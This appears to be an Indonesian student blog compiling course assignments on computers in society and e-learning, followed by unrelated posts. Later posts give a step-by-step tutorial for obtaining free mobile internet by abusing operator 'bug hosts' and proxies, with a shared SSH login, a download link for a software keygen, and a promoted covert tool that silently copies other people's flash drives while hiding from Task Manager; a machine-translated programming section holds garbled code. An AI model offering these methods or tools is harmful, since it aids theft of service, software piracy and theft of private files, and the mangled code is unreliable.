Presentasi Kelompok

1.Pertanyaan :

Instructions

Buat Kelompok Yang Terdiri Dari 5 Orang, Masing – Masing Kelompok bertugas Membahas Dalam Bentuk Slide Minimal 10 Slide Untuk Materi Pilihan Hubungan Antara :

1. Komputer Dan Hiburan

2. Komputer dan Pendidikan

3. Komputer dan Kesehatan

4. Komputer dan Perdagangan

5. Komputer dan Pemerintah

6. Komputer dan Anak-Anak

7. Komputer dan Agama

8. Komputer dan Kriminalisasi

Materi Slide yang sudah dibuat disubmit masing2 anggota kelompok pada assignment ini dan dipresentasikan dikelas.

2.Status : Tercapai 100%

3.Keterangan : Saya Sudah Presentasi Bersama Kelompok Saya

4.Bukti :

Klik Disini

 

Tugas Komputer Dan Pendidikan – E-Learning

  1. Pertanyaan :

    Instructions

    Buat Kelompok Yg Terdiri dari 5 orang untuk melakukan survey baik langsung maupun tidak langsung terhadap Kampus yg menyelenggarakan pembelajaran Jarak Jauh E-Learning. Adapun Hal2 Yg Harus Ada Minimal :

    1. Sejarah Awal Mula Pembentukan Kelas E-Learning

    2. Tata Cara Pendaftaran Mahasiswa Baru

    3. History Perkembangan Mahasiswa

    4. Petunjuk Pelaksanaan dan Petunjuk Teknis Proses KBM

    5. Proses Belajar Mengajarnya

    6. Perangkat IT pendukung E- Learning

    7. Sistem Penilaian

    8. Kurrikulum

    9. Sistem Kelulusan

    Masing 2 anggota kelompok harus mensubmit assigment ini.

    2. Status : Tercapai 100%

    3. Keterangan : Saya sudah mengerjakan Tugas.

    4. Bukti :

 

  1. Kelas E-Learning di Universitas Indonesia

Sejarah Awal Mula Pembentukan Kelas E-Learning
Dalam upaya merealisasikan Visi Universitas Indonesia menuju Universitas Riset Kelas Dunia, dan menempatkan diri di era perkembangan teknologi informasi modern, metode pembelajaran di UI perlu mendapat perhatian khusus untuk dikembangkan dan ditingkatkan.

Perhatian tersebut secara eksplisit tertuang dalam Kebijakan Umum Arah Pengembangan UI periode 2007-2012 (Keputusan Majelis Wali Amanat Universitas Indonesia Nomor : 005/SK/MWA-UI/2007) yaitu dalam pernyataan “Mengintensifkan pembelajaran berbasis e-Learning”. Pernyataan ini mengindikasikan secara implicit menuntun perubahan paradigma dalam metode pembelajaran dari teacher-centered menuju ke arah learner-centered dengan segala konsekwensinya.

Mengantisipasi segala kemungkinan yang bisa terjadi dalam penjaminan mutu akademik berkenaan dengan penyelenggaraan metode pembelajaran berbasis e-Learning, baik yang terkait dengan kode etik maupun aturan hukumnya, Badan Penjaminan Mutu Akademik (BPMA), menyusun buku Pedoman Penjaminan Mutu Penyelenggaraan e-Learning, yang dapat dijadikan pegangan bagi para dosen dalam melaksanakan tugasnya.

2. Tata Cara Pendaftaran Mahasiswa Baru:
Supaya bisa diterima sebagai mahasiswa kelas PJJ, calon mahasiswa perlu melalui seleksi SIMAK, di mana ujian bisa dilakukan di USBJJ/Mitra atau di UI.

3. History Perkembangan Mahasiswa:

History perkembangan Mahasiswa di Universitas Indonesia saat adanya pembelajaran E-Learning ini cukup mengalami progres yang baik, karena mahasiswa yang sibuk yang notabennya sudah bekerja pun bisa melanjutkan kuliah dengan sistem pembelajaran E-Learning ini walaupun dibandingkan kelas Reguler kelas E-Learning itu tidak terlalu banyak yang mengambil kelas E-Learning biasanya mahasiswa yang sudah berkeluarga atau seorang pengusaha ataupun karyawan.

4. Petunjuk Pelaksanaan dan Petunjuk Teknis Proses KBM

Petunjuk Pelaksanaan dan Petunjuk Teknis Proses KBM
1. Tatap muka tradisional
2. Web-enhanced(pembelajaran diperkaya dengan akses Internet)
3. Mengkombinasikan cara online dan tatap muka. Ada proporsi pengantaran bahan ajar yang online, biasanya dilengkapi dengan diskusi online, dan ada pengurangan
frekuensi tatap muka

5. Proses Belajar Mengajarnya
a) memanfaatkan sumber belajar yang tidak harus berada pada satu tempat
yang sama dengan peserta didik;
b) modus pembelajaran bersifat ganda (dapat terpisah maupun tatap muka);
c) menekankan belajar secara mandiri, terstruktur, dan terbimbing dengan
menggunakan berbagai sumber belajar;
d) menggunakan bahan ajar dalam bentuk e-learning dan kombinasinya
dengan bahan ajar lain dalam beragam bentuk, format, media dan dari beragam sumber;
e) memanfaatkan media pembelajaran berbasis teknologi informasi dan komunikasi sebagai sumber belajar yang dapat diakses setiap saat;
f) menekankan interaksi pembelajaran berbasis teknologi informasi dan komunikasi.

6. Perangkat IT pendukung E- Learning:

Kuliah online dapat diakses melalui portal http://elearning.unpad.ac.id/. Bukan hanya kuliah online, e-Learning memiliki berbagai layanan guna mengoptimalkan kegiatan belajar mengajar, diantaranya:

Training Services (Layanan Pelatihan)

Layanan pelatihan kami dapat dilakukan baik secara in-house training maupun in-service training. Beberapa pelatihan yang kami selenggarakan adalah:

– Online Learning Management System
– ICT
– Desktop Applications
– Networking
– Multimedia

Online course Development (Pembangunan Mata Kuliah OnLine)
E-Learning Unpad membangun mata kuliah online yang dapat diakses oleh mahasiswa. Proses ini dilakukan bersama para pendidik yang tentunya semakin sadar akan perlunya alternatif pembelajaran ini. Prosesnya meliputi:

– Course Designing
– Digital Course Developing
– Multimedia Developing

E-Learning Consulting (Konsultasi e-Learning)
Beberapa saluran, baik face to face maupun bermedia, telah kami buka untuk melayani berbagai pertanyaan mengenai proses pembelajaran bermedia elektronik ini. Hal-hal yang dapat dikonsultasikan diantaranya mengenai:

– How To Design On Line Course
– How To Create Good On Line Course
– How To Design Content
– On Line Course Management
– Bussiness Developing

Research and Development (Riset dan Pembangunan)
e-Learning tak henti melakukan penelitian guna pengembangan fungsi lembaga ini kedepannya. beberapa metode yang biasa kami lakukan adalah:

– Knowledge Management Research Group
– E-Learning Software Group
– Content Repository Team

Sejak 2012, setiap tahunnya, e-Learning bersinergi dengan berbagai komponen di Lembaga Pengembangan Pembelajaran dan Penjaminan Mutu (LP3M) Unpad, berupaya menghasilkan 100 mata kuliah yang online yang terintegrasi dalam program “Penyusunan 100 Modul dan Bahan ajar Digital di Lingkungan Universitas Padjadjaran”.

7. Sistem Penilaian:

Universitas Padjadjaran menggunakan sistem penilaian berbasis LMS Moodle. LSM Moodle merupakan salah satu penunjang pembelajaran berbasis e-learning. LMS Moodle tersebut ialah salah satu aplikasi gratis Open Source yang telah banyak dipakai di beberapa perguruan tinggi untuk mengakomodasi e-learning. Dengan kata lain, LMS Moodle adalah software yang dipakai untuk program e-learning. Kelebihan dari software ini, kita secara otomatis bisa membuat suatu pengaturan sampai penilaian dalam e-learning. Dengan sistem yang otomatis dan dapat diatur tersebut bisa mengetahui bagaimana aktivitas mahasiswa saat mengakses e-learning, seperti mengetahui apakah mahasiswa sudah membaca atau belum PDF atau Power Point yang ada di e-learning, serta melakukan penilaian pada saat diskusi dalam suatu forum. Nilai-nilai tersebut akan otomatis tertera dalam sebuah tabel berdasarkan aktivitas mahasiswa selama berada di forum e-learning.

Namun, LMS Moodle itu sendiri masih memiliki banyak kendala, salah satunya ialah masih banyak pengguna yang belum memahami penting LMS Moodle ini. Kebanyakan user masih belum merasakan apa sih manfaatnya menggunakan LMS Moodle. Selain itu, kendala lain menyangkut LMS Moodle ini terletak pada stabilitas jaringan yang tidak merata. Sekali waktu koneksinya optimal, sekali waktu naik turun. Dan masih banyak para dosen pun yang menganggap bahwa LMS Moodle ini kurang efektif mengingat belum terbiasanya mereka menggunakan LMS Moodle.

8. Kurrikulum
Kurikulum PJJ perlu memuat beberapa hal berikut:
-Capaian pembelajaran yang sama dengan capaian pembelajaran pada
sistem tatap muka secara penuh
– Dalam PJJ juga diberlakukan dalam sistem paket gasal-genap.
– Beban studi untuk menyelesaikan setiap program studi yang
diselenggarakan dengan sistem PJJ juga sama dengan beban studi pada
sistem tatap muka secara penuh.
– Masa studi PJJ 6 (enam) semester dan maksimal 9 (sembilan) semester
– Masa residensial di UI untuk tatap muka dan pembimbingan

9. Sistem Kelulusan:

Sistem Kelulusan mahasiswa e-learning di Unpad sama dengan sistem kelulusan mahasiswa yang mengambil kuliah biasa. Nilai kelulusan mereka dinilai dari apakah mahasiswa sudah membaca atau belum PDF atau Power Point materi dosen yang ada di e-learning, diskusi dalam suatu forum, mengerjakan tugas/mengupload tugas(file,video,gambar) yang berkaitan dengan tugas dari dosen. Nilai-nilai tersebut akan otomatis tertera dan di input oleh dosen masing-masing matakuliah. Jadi, nilai kelulusan dapat di monitor atau di pantau langsung oleh dosen selama mahasiswa berada di forum e-learning.

Manfaat Penggunaan Komputer Bagi Manusia

1. Pertanyaan :

Berbagai aktifitas kehidupan manusia dengan menggunakan komputer

1. Perbankan
2. Perdagangan
3. Industri
4. Tranportasi
5. Rumah Sakit
6. Pendidikan
7. Seni
8. Penelitian
9. Hiburan
10. Keamanan
11. Komunikasi

2. Status : Tercapai 100%

3. Keterangan : Saya Sudah Mengerjakan Tugas

4. Bukti

1. Perbankan

Di bidang perbankan komputer telah banyak mempengaruhi bahkan hampir semua dibidang perbankan sekarang menggunakan bantuan komputer. Seperti Tranfer uang di bank, jika kita kerjakan secara manual mungkin ini memakan waktu yang sangat lama, namun bila dikerjakan oleh komputer ini hanya memerlukan beberapa detik saja dengan akurat dan cepat. Contoh lainnya yaitu pada penggunaan kartu kredit, dimana seseorang yang menggunakan kartu kredit lebih mudah didalam menggunakannya ketika berjualan atau membeli, karena lebih ramping, simple, cepat dan aman.

2. Perdagangan

Nah, pada bidang ini adanya komputer juga sangat membantu, baik itu dalam mengelola barang, menganalisis, menghitung segala hal yang penjualan atau lainnya. Apa saja manfaat lainnya:
– Transaksi jual beli lebih mudah
– Dapat menyimpan hasil transaksi, stock dan lainnya
– Membantu pembuatan laporan keuangan, surat-surat, dokumen dan lain-lain
– Mendukung pembayaran tunai maupun elektronik

3. Industri

Pada bidang industri komputer berperan penting, karena dengan adanya peran dari si komputer banyak pekerjaan di bidang ini akan menghasilakan produktifitas kerja yang baik. Maka dari itu banyak industri-industri sekarang menggunakan bantuan komputer. Contoh pekerjaan komputer dibidang ini seperti perancangan akan lebih mudah, perangkaian kerangkan mesin yang benar dan akurat dan lain-lain.

4. Transportasi

Pada bidang ini komputer juga berpangaruh banyak lo, contohnya yang sering kita jumpai yaitu:
– Mengatur lampu lalu lintas,
– Kereta listrik
– Reservasi
– dan lain-lain

5. Rumah Sakit

Di bidang kedokteran komputer juga mempengaruhi banyak aspek, yaitu seperti:
– Menyimpan riwayat penyakit pasien,
– Mengatur gaji para karyawan RS,
– CAT (Computer Axial Tomography) Scan,
– Mengelola persediaan obat, kamar pasien dan lainnya

6. Pendidikan

Kini komputer telah mempengaruhi di aspek pendidikan seperti:
– CBE (Computer Based Education)
– CAI (Computer Assisted Instruction)
– Meimpan data-data pendidikan dan para mrid,
– Menyiapkan materi, soal-soal ujian maupun latihan.

7. Seni

Pada bidang seni komputer juga berpengatuh banyak lo, seperti:
– Animasi,
– Photography,
– Penciptaan lagu dan lainnya

8. Penelitian

Apa saja manfaat komputer pada bidang ini:
– Penelitian angkasa lepas,
– Satelit
– Penyelidikan tenaga nuklir,
– Peramalan cuaca dan lainnya

9. Hiburan

Nah, di bidang ini manfaat komputer yang sering kita jumpai yaitu:
– Game
– Bioskop
– Roller Coaster dan lainnya

10. Pertahanan dan Keamanan

Pada bidang ini juga membutuhkan komputer lo, contohnya
– Sistem senjata,
– kapal Selam
– Latihan perang dan lainnya

11. Komunikasi

Pada bidang komunikasi banyak manfaatnya yaitu seperti
– Email
– Chatting
– Forum Diskusi dan lainnya

III. KESIMPULAN

Manfaat komputer dengan beragam cara mulai sebagai alat bantu menulis, menggambar, mengedit foto, memutar video, memutar lagu sampai analisis data hasil penelitian maupun untuk mengoperasikan program-program penyelesaian problem-problem ilmiah, bisnis, bahkan mengendalikan pesawat ruang angkasa. Penggunaan komputer untuk mencari informasi di bidang Perbankan, Transportasi, Pendidikan, Komunikasi Dan Teknologi Informasi data yang diperoleh informasi yang cepat, akurat, informatif dan efisien.

Seperti dikutip dari BBC, seorang ilmuwan dari Institute for Computing in the Humanities, University of Illinois, Amerika Serikat (AS), Kalev Leetaru, mengemukakan bahwa sebuah komputer super yang dibekali dengan berjuta-juta informasi mampu memprediksi kejadian-kejadian besar di masa mendatang. Teknologi Informasi dapat didefinisikan sebagai suatu teknologi yang berfungsi untuk menghasilkan, menyimpan, mengolah, dan menyebarkan informasi tersebut dengan berbagai bentuk media.

Dampak Teknologi Informasi tersebut terbagi atas 2, yaitu dampak positif dan dampak negatif. Manfaat yang didapatkan, teknologi informasi mulai digunakan dan diterapkan untuk membantu operasional dalam proses bisnis. Dampak negative, penggunaan komputer yang bertujuan untuk memperingan dan mempercepat pekerjaan, di sisi lain bisa menimbulkan pengangguran, karena beban pekerjaan semakin berkurang dengan adanya komputer.

Cara Internet Gratis Menggunakan HTTP Injector

Berikut langkah – langkah cara internet gratis menggunakan HTTP Injector. Langkah yang akan kita lakukan ini juga berlaku untuk semua Operator (Provider). Di tutorial kali ini Saya akan menjelaskannya step by step secara rinci agar kalian juga bisa menikmati Internet Gratis. Entah itu limit bandwith maupun Unlimited Bandwith.

Mencari Bug Host Operator (Provider)
Pada dasarnya Bug Host yang dicari adalah host yang bisa kita lakukan cek HTTP Header secara gratis Nol Pulsa Nol Kuota atau tanpa adanya biaya akses internet saat melakukan cek Custom Header secara langsung. Atau juga host (URL/IP Address) yang bisa diakses menggunakan Browser secara gratis seperti internet.org dan lainnya. Ada beberapa langkah yang bisa dilakukan untuk mencari Bug Host Operator, diantaranya sebagai berikut :
a. Mengetahui situs resmi Operator SimCard yang digunakan.
Kemungkinan kita bisa mengakses gratis situs resmi Operator. Sehingga kita bisa menggunakannya sebagai Bug Host. Kita bisa mencari Bug Host di Google atau mesin pencari lain, atau dengan bertanya kepada orang lain.
Berikut ini adalah daftar situs resmi operator seluler di Indonesia baik GSM maupun CDMA.
Mentari, IM3, StarOne – http://www.indosat.com – http://www.indosatooredoo.com/
simPATI, Kartu As – http://www.telkomsel.com/
XL, Axis – http://www.xl.co.id/ – http://www.axisnet.id/
Three / 3 – http://www.tri.co.id/
Smart, Fren – http://www.smartfren.com/

b. Menggunakan DNS Databases
DNSDB adalah database yang menyimpan dan mengindeks kedua data DNS pasif yang tersedia melalui perpindahan informasi keamanan “Farsight Security” serta data DNS otoritatif dengan beragam zona operator yang disediakan. DNSDB memudahkan untuk mencari RRsets DNS tersendiri dan memberikan metadata tambahan untuk hasil pencarian seperti saat pertama kali timestamps terlihat dan terakhir dilihat serta lingkungan pengetahuan DNS terkait dengan RRset. DNSDB juga memiliki kemampuan untuk melakukan inverse atau pencarian rdata.
Contoh dalam kasus ini kita menggunakan URL situs resmi Indosat yaitu indosatooredoo.com, kita bisa menggunakan format :

http://URLsitus.dnsdb.org = http://indosatooredoo.com.dnsdb.org

Anda bisa menemukan beberapa daftar Bug Host yang terlihat di dnsdb.org tersebut.
c. Cek Server Headers Bug Host di UriValet.com
Kita perlu mengecek Server Header dari bug host yang telah kita dapatkan melalui dnsdb.org apakah masih aktif atau tidak. Silahkan Cek semua bug di situs UriValet.com atau situs lain dengan tujuan yang sama. Berikut cara Cek Server Headers Bug Host di UriValet.com :

Lengkapi kolom dan informasi yang diperlukan, sesuaikan dengan Gambar 1.1 kemudian klik “Submit” tunggu analisanya sampai sukses.
Lihat status server response, jika 302 atau berwarna kuning berarti bug kemungkinan mati.

d. Memeriksa Informasi Header Host melalui Alat Host Checker yang ada di HTTP Injector
Hal ini diperlukan untuk memastikan apakah host tersebut bisa digunakan ataupun tidak secara gratis Nol Pulsa Nol Kuota atau tanpa adanya biaya akses internet saat melakukan cek Custom Header secara langsung. Lakukan ini saat Nol Pulsa Nol Kuota Nol Nol Nol.
Berikut cara memeriksa informasi Header Host melalui alat host checker yang ada di HTTP Injector :

Klik Tab Alat > Host Checker.
Isi URL dengan bug host yang telah kita dapatkan.
Pilih salah satu method (GET,POST,HEAD,OPTIONS,PUT,DELETE,TRACE,PATCH).
Isi proxy standar operator dengan format (IP:port) atau bisa dengan ceklist “Permintaan Langsung”
Klik “Periksa”.

Inilah proxy standar operator di indonesia:

Kartu Telkomsel (Simpati dan AS) => 10.1.89.130:8000
Kartu Indosat (Mentari dan IM3) => 10.19.19.19:8080
Kartu Three (3AON) => 10.4.0.10:3128
Kartu Axis => 10.8.3.8:8080
Kartu XL => 202.152.240.50:8080

Tidak semua yang respon 200 OK bisa dipakai. Dan tidak semua respon yang bermasalah seperti 302 Found tidak bisa digunakan. Host bisa saja unlimited, mungkin juga limit dibatasi kuotanya oleh operator sekian MB. Speed Download/Upload mungkin dibatasi oleh pihak Operator

Membuat Akun SSH
Kita memerlukan akun SSH untuk bisa menikmati Internet Gratis menggunakan HTTP Injector. Situs yang menyediakannya ada banyak antara lain Bestvpnssh, Createssh, Fastssh, Highssh, Mytunneling, Sshgoogle dan sebagainya.
Saya biasanya daftar di FastSSH. Silahkan Kalian daftar SSHnya kemudian salin informasi akunnya di EditorText yang kalian suka gunakan.

Tips : Pendaftaran X-TRA SG Servers di fastssh.com dibuka setiap 30 menit, standby-lah disaat 2menit sebelum tombol OPEN tersedia “jangan menunggu hijau baru klik OPEN” bisa kalah cepat dengan orang lain, misalnya OPEN jam 07:30 standby jam 07:28, saat itu juga mendaftar usahakan sudah dalam posisi klik “continue create account” dan sudah mengisi password dan capcha, saat di detik-detik terakhir mau 07:30 boomm..!!! segeralah klik “create account”.

Konfigurasi HTTP Injector

Pengaturan SSH
Buka icon menu di HTTP Injector > Pengaturan SSH.
Isi menurut informasi akun SSH yang kalian buat tadi.
Gunakan port 443 atau 22
Penghasil Payload dan menjalankannya
Buka icon menu di HTTP Injector > Penghasil Payload, Lakukan konfigurasi sesuai dengan gambar dibawah ini.
Kemudian klik “Membuat Payload” payload akan terisi otomatis.
Isi kolom Remote Proxy dengan format (ip:port) contoh 10.19.19.19:8080
Klik mulai.
Lihat proses di tab “Log” lihat gambar dibawah ini.

Kalian bisa melihat tanda kunci di status bar yang menandakan HTTP Injector berhasil terhubung.
Membagikan Config
Anda bisa membagikan Config yang telah Anda buat dengan mengekspor config kedalam file dengan extensi *.ehi file. Caranya klik icon titik tiga yang berada di pojok kanan atas kemudian Exspor Config. Isi dan atur sesuai keinginan Anda. Anda juga bisa mengimport Config dari file *.ehi untuk bisa digunakan di HTTP Injector dengan cara klik icon titik tiga di pojok kanan atas lalu pilih “Import Config”.

Download Hasil Config : mykodetutorial_blog.ehi
Update SSH Account Username SSH : fastssh.com-resepion
Password SSH : suyonoion
Host IP Addr : x-sgdo2.serverip.co
Date Created : 09-May-2016
Date Expired : 16-May-2016

Demikian Tutorial Cara Internet Gratis Menggunakan HTTP Injector. Tutorial ini hanya contoh sebagai pengalaman pengguna saja tentang menggunakan tool HTTP Injector Apk untuk menghubungkan SSH/Proxy dengan custom header yang bisa mengakses situs yang diblokir oleh Operator di belakang firewall dengan dukungan SSH tunneling & proxy server.
Tutorial ini bertujuan dengan baik, sebagai pengetahuan saja, mengenai SSH, cek server header sebuah host, tunneling dan proxy server serta tidak bermaksud apa-apa karena blog ini dibawah pengawasan Google yang harus mematuhi TOS Google dan Hukum IT di Indonesia. Dengan Harapan semoga Provider – Provider di Indonesia menyediakan Kuota Bandwith yang lebih murah serta memperbaiki system yang ada.
Kami Mohon maaf jika ada kesalahan kata dalam tutorial Cara Internet Gratis Menggunakan HTTP Injector, kurang lebihnya mohon maaf yang sebesar-besarnya. Jika tutorial ini cukup bermanfaat silahkan bagikan artikel ini. Terimakasih

Universal keygen Untuk semua Software

Download Universal keygen Untuk semua Software. Universal Keygen / Serial Kunci Genarator 2012-2013.Kamu dapat meng-genarate sebagian besar kunci software Anda dengan menggunakan software ini. Ini adalah perangkat lunak yang sangat berguna.Universal Keygen 2013 adalah sebuah Genarator Key dari kumpulan software-software yang sangat populer di dunia.Untuk mengaktifkan perangkat lunak Anda, Anda dapat meng- genarate xaktivasi dan kunci serial dengan menggunakan software ini. Hanya Download dan Jalankan Software ini dan Cari Serial Anda. Fitur Universal Keygen 2013: Genarate semua kunci software Serial. Cari Serial Software abjad Anda Cari Serial Anda Tanpa koneksi internet dengan mudah.

Link Download : http://www.solidfiles.com/d/8c4e4fb277/

Mengambil Data Dari Flasdisk

Anda memiliki teman yang sangat tidak ingin datanya anda copy…????? Jangan kuatir, anda dapat meminjamkan Pc/ Laptop anda kepadanya dan
semua file yang dia miliki akan menjadi milik anda…!!! Gimana caranya,, Yuupss.. Kita Rampok dia,, hehehe.. Seriuuuss akh..!!! Seperti
judulnya, Software Rampok adalah program yang tuhuannya dapat digunakan untuk membajak atau mengkopi setiap data isi di Flashdisk dengan
sendirinya yang terhubung dengan komputer, dimana seluruh file yang ada di flasdisk tersebut akan di copy kedalam hardisk dalam direktory
yang telah ditetapkan.. Cara kerjanya sangat mudah, anda tinggal mengaktifkan program rampok lalu pilih folder tempat untuk menyimpan hasil
kopian dan aktifkan Program Rampoknya. Dan tunggu hingga ada Flashdisk yang tertancap di komputer dan tanpa disadari isi flashdisk sudah
terkopi di komputer. Isi dari flasdisk tidak akan berubah dan tidak terdelete. Program ini tidak bisa dikatakan virus, karena program ini
tujuannya untuk mengambil data dari flasdisk tanpa sepengetahuan si pemilik flashdisk. Hehee 😛 Berhati2lah menggunakan flashdisk di komputer
orang, coba periksa apakah di komputer mereka terdapat program rampok, kalau tidak maka segala dokumen pribadi anda akan dibaca oleh mereka.
===Fitur Rampok v 2 apa aja???=== Rampok yang kedua mempunyai tambahan fasilitas seperti: 1. Menggunakan user dan password (digunakan untuk
menutup aplikasi dan menonaktifkan kerja program). 2. Bisa startup program saat komputer dihidupkan. 3. Menggunakan button on/off untuk
mengaktifkan dan menonaktifkan kerja program. 4. Bisa memilih alamat folder dan nama folder yang akan digunakan menampung hasil copy_an. 5.
Rampok.exe tidak muncul dalam tasklist processes di task manager saat dijalankan. 6. Proses Pengcopian tidak terdeteksi GUInya.

Link Download : http://www.mediafire.com/file/2eicoqq3mldkd5d/U_Rampok_v2.0.rar

Pemrograman Efisien

Tips dan trik untuk pemrograman efisien

Serta hal-hal yang biasa seorang programmer yang baik akan lakukan, ada beberapa masalah khusus untuk MSPGCC yang Anda harus sadar.

1.Jika Anda yakin rutin utama Anda tidak akan pernah keluar, Anda dapat menggunakan “-mendup-at = utama” bendera saat kompilasi. Ini akan menghemat 6 byte ROM.

2.Hindari melewati daftar argumen panjang untuk fungsi. Hindari kembali nilai-nilai lama dari fungsi. Jenis fungsi yang paling efisien untuk digunakan adalah batal, int, atau pointer.

3. Hindari menginisialisasi variabel global dalam fungsi kecil. Sebaliknya, menetapkan nilai selama definisi variabel.

4. Hindari mengkonversi karakter ke jenis lain. variabel arang bisa ditemukan di mana saja di RAM, sedangkan variabel kata hanya bisa berada di bahkan alamat. Karena ini, kode berikut:

const char * a = “1234”;
int k;
k = * ((int *) ((char * a) + 3));

akan menghasilkan perilaku CPU tak terduga.

5. Gunakan int bukannya char atau unsigned char jika Anda ingin bilangan bulat kecil dalam fungsi. Kode yang dihasilkan akan lebih efisien, dan dalam kebanyakan kasus penyimpanan tidak benar-benar sia-sia.

6. Memeriksa kode assembler (S compiler bendera). compiler tidak dapat menghilangkan kode mati dalam beberapa kasus. Jangan menulis kode mati 🙂

7. Tidak menyatakan SFRs Anda sendiri. Mereka semua menyatakan dalam menyertakan file dengan cara yang benar untuk mencapai kinerja kode maksimal.

8. Cobalah untuk meminimalkan penggunaan penjumlahan dan pengurangan dengan angka floating point. Ini adalah operasi lambat.

9. Gunakan pergeseran bukannya perkalian dengan konstanta yang 2 ^ N (sebenarnya, compiler dapat melakukan ini untuk Anda ketika optimasi diaktifkan).

10. Gunakan int unsigned untuk indeks – compiler akan snip _lots_ kode.

11. Gunakan ‘switch / kasus’ membangun daripada rantai konstruksi ‘jika / lain’.

12. Gunakan logis atau ( ‘|’) daripada ‘+’ untuk bitmasks.

13. Ketika mendefinisikan sedikit bidang, cobalah untuk menggunakan bilangan bulat ditandatangani. Ini menghasilkan lebih kode kompak yang sedikit bidang unsigned integer.

14. Gunakan ‘alloca’ bukan ‘malloc’ bagi penduduk setempat. Dalam aplikasi embedded mencoba untuk menghindari alokasi memori dinamis biasanya lebih baik;).

15. C ++ recomendations samping :-), dapat lebih efisien untuk menggunakan:

#define SMTS 1234567890l

bukannya menyatakan

SMTS panjang const = 1234567890l;

16. loop delay adalah rutinitas yang sangat canggih 🙂 Pengembang sering melakukan sesuatu seperti.:

int i = 1234;

ketika saya–);

atau

int i;

untuk (i = 0; i <1234; i ++);

TIDAK AKAN BEKERJA SEBAGAI ANDA HARAPKAN ketika optimasi diaktifkan !!! optimizer akan mendeteksi kode mati di kedua contoh dan akan menghilangkannya. Bahkan mungkin menghilangkan lingkaran sepenuhnya. Menambahkan atribut volatile definisi 'i' mungkin bisa membantu, tetapi tidak mengandalkan itu jika 'i' adalah variabel lokal. compiler masih dapat mendeteksi perhitungan boros, dan menghilangkan mereka.

Terlepas dari masalah optimasi ini, jenis delay loop gaya pemrograman miskin – Anda tidak tahu berapa lama atau pendek penundaan mungkin menghasilkan (meskipun ada minimum jelas terikat!). Akan lebih baik, dan lebih dapat diandalkan untuk menentukan sesuatu seperti:

static void __inline__ brief_pause (daftar unsigned int n)
{
__asm__ __volatile__ (
"1: \ n"
"Desember% [n] \ n"
"Jne 1b \ n"
: [N] "+ r" (n));
}

dan memanggil rutin ini di mana diperlukan. Ini sederhana, kompak, dan dapat diprediksi.

17. Menggunakan atribut volatile untuk variabel yang dapat diubah atau diperiksa oleh lebih dari satu thread pengolahan (mis kode utama dan rutin interupsi). Jika Anda digunakan untuk compiler kurang efisien, Anda dapat digunakan untuk menulis kode seperti:

int i;

interrupt (TIMERA0_VECTOR) irq_routine (void)
{
i = 42;
}

kekosongan func (void)
{

i = 0;
sementara (i == 0);
}

Jika kita asumsikan interupsi bekerja, dan "func" disebut, Anda mungkin berharap "func" untuk kembali setelah timer A interrupt terjadi. Optimizer akan menghasilkan kode yang benar-benar memegang "i" dalam daftar dalam "func", dan loop di "func" tidak akan pernah menanggapi perubahan ke lokasi memori untuk "i", disebabkan dalam rutin interupsi. compiler bahkan mungkin menghilangkan uji "i" sepenuhnya, meninggalkan loop tak terbatas benar.

Untuk memberitahu compiler bahwa itu harus melihat lokasi memori yang sebenarnya dari "i" setiap kali memeriksa atau memanipulasi "i", yang "volatile" atribut harus ditambahkan definisi "i".

18. Hindari menggunakan "volatile" atribut, kecuali hal ini sebenarnya diperlukan. Karena memaksa compiler untuk menghasilkan kode tambahan untuk memuat, menyimpan dan menguji lokasi memori variabel ini dalam semua keadaan, secara signifikan mengurangi efektivitas Optimizer compiler. godaan untuk membuat banyak definisi global "volatile", hanya untuk berbuat salah di sisi yang aman, datang pada harga.

Cobalah untuk menghindari melakukan hal-hal rumit dalam kode Anda, kecuali Anda benar-benar yakin Anda mengerti konsekuensinya. 🙂

7 Sistem Operasi yang Biasa Digunakan Hacker

1. Kali Linux
Kali Linux merupakan sistem operasi Linux berbasi Debian yang didesain untuk . Sistem operasi ini dikembangkan oleh tim dari Offensive Security Ltd. Dimana tim tersebut adalah tim yang sama yang mengembangkan OS BackTrack yang sempat populer dikalangan Hacker.

Read more: https://www.kali.org/downloads/

2. BackBox
Dinomor 2 ada BackBox Linux atau biasa disebut juga BackBox. Sistem operasi berbasis Ubuntu ini memiliki banyak sekali aplikasi-aplikasi penetrasi yang biasa digunakan untuk penetrasi kedalam sistem, komputer forensik, sniffing, eksploitasi dan masih banyak lagi.

Read more: https://backbox.org/download

3. Parrot Security Forensic OS
Selanjutnya ada Parrot-Sec OS. Sistem Operasi ini merupakan gabungan dari OS GNU/Linux berbasis Debian yang dikombinasikan dengan FrozenBox OS serta Kali Linux yang bertujuan untuk memberikan pengalaman terbaik saat melakukan penetrasi dan juga mengetes kemanan dalam suatu sistem. Parrot-Sec OS biasa digunakan pada para pakar keamanan IT.

Parrot Security juga memiliki tools yang cukup lengkap. Selain itu Parrot OS menggunakan tampilan desktop MATE sebagai tampilan defaultnya. Dengan banyaknya dukungan dikomunitas Parrot OS, tidak ada salahnya untuk menggunakan Sistem Operasi ini untuk testing keamanan sistem.

Read more: https://www.parrotsec.org/download.fx

4. DEFT
Deft adalah sistem operasi derivatif dari Linux Ubuntu dimana didalamnya terdapat banyak sekali program-program untuk komputer forensik yang dibuat oleh berbagai macam kalangan individual, tim serta perusahaan keamanan IT.

Read more: http://www.deftlinux.net/download/

5. Live Hacking OS
Live Hacking OS adalah sistem operasi Linux yang didalamnya terdapat berbagai macam program untuk testing keamanan suatu sistem. Live Hacking OS tidak perlu diinstall kedalam PC dan bisa dijalankan melalui media penyimpanan DVD. Dengan menggunakan tampilan User Interface dari GNOME, Live Hacking cukup mudah dipelajari. Sayangnya Live Hacking OS ini sudah tidak dikembangkan sejak pertengahan Mei 2011. Kalian yang ingin mencoba Live Hacking OS bisa mendownloadnya dibawah.

Read more: http://www.livehacking.com/live-hacking-cd/download-live-hacking/

6. Samurai Web Security Framework
Samurai Web Security Framework adalah sebuah OS berbasis linux yang biasa digunakan untuk penetrasi kedalam keamanan web. Didalamnya banyak sekali aplikasi-aplikasi berbasis open-source yang bisa digunakan untuk mengecek keamanan suatu Web. Kalian yang ingin mencoba OS Samurai Web Security Framework bisa mendownload melalui SourceForge dibawah.

Read more: https://sourceforge.net/projects/samurai/files/

7. Network Security Toolkit (NST)
Satu lagi sistem operasi berbasis Fedora yang bisa digunakan untuk hacking, namanya Network Security Toolkit (NST).

Read more: https://sourceforge.net/projects/nst/

Membuat halaman fakelogin

